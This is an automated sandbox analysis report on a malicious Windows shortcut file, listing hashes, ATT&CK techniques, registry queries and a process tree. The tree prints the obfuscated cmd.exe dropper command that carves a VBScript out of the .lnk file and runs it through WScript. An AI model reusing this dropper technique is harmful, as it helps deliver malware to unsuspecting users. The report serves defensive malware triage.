2b8ca80ca776c90f02c90fd7e5f55fb29a756357bd9f55c432ab81cf65c22d5a

Analysis

max time kernel
112s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
15-06-2022 01:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Label_83803.txt.lnk
Size

9KB
MD5

ee4e5b2df114a4f76238a0a8b012f46c
SHA1

f082523c533b366149c2155a200bc6f7dc16ce8a
SHA256

5db9e0839d3567a3ca502874d1528d71c55fc55515efa3f2f1deaa95aea9b027
SHA512

c1262c315e4b359f7ff6175fe49f7573ebb25d0888d265b0b539fe73f5de41efa892450033b887111460cfbb4605ade8dcd2a1115884d1bb68658e0c5a4bab69

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	1028	WScript.exe
16	1028	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings	cmd.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 4164	1732	cmd.exe	81
PID 1732 wrote to memory of 4164	1732	cmd.exe	81
PID 4164 wrote to memory of 4012	4164	cmd.exe	82
PID 4164 wrote to memory of 4012	4164	cmd.exe	82
PID 4164 wrote to memory of 1028	4164	cmd.exe	83
PID 4164 wrote to memory of 1028	4164	cmd.exe	83

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Label_83803.txt.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /v:on /c seuhv & set "gLZKl=inds" & (f!gLZKl!tr "dfPWo.*" Label_83803.txt.lnk > "C:\Users\Admin\AppData\Local\Temp\CWnfn.vbs" & "C:\Users\Admin\AppData\Local\Temp\CWnfn.vbs") & cECVU
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4164
- - C:\Windows\system32\findstr.exe
    findstr "dfPWo.*" Label_83803.txt.lnk
    3⤵
    PID:4012
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CWnfn.vbs"
    3⤵
    - Blocklisted process makes network request
    PID:1028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CWnfn.vbs

Filesize
7KB

MD5
15c05d6e53fd3d4afa06357cec5406d0

SHA1
588a7a8fe15838369ff4869b5d5db89bd43f2639

SHA256
ab1066081034eec60d076d6ef027d6e44a48a7016acf9b8ae860032f78aa72ad

SHA512
b0c01e1570b6dff9ba5aec1939a89c3c81d51db7bf22bbe82750197f58086b0b34ef6f4cb97bbab6eb926b719915a1ef63be411f5f16afe2caeb2565a72c7f02

Download Submit
memory/1028-132-0x0000000000000000-mapping.dmp

Download
memory/4012-131-0x0000000000000000-mapping.dmp

Download
memory/4164-130-0x0000000000000000-mapping.dmp

Download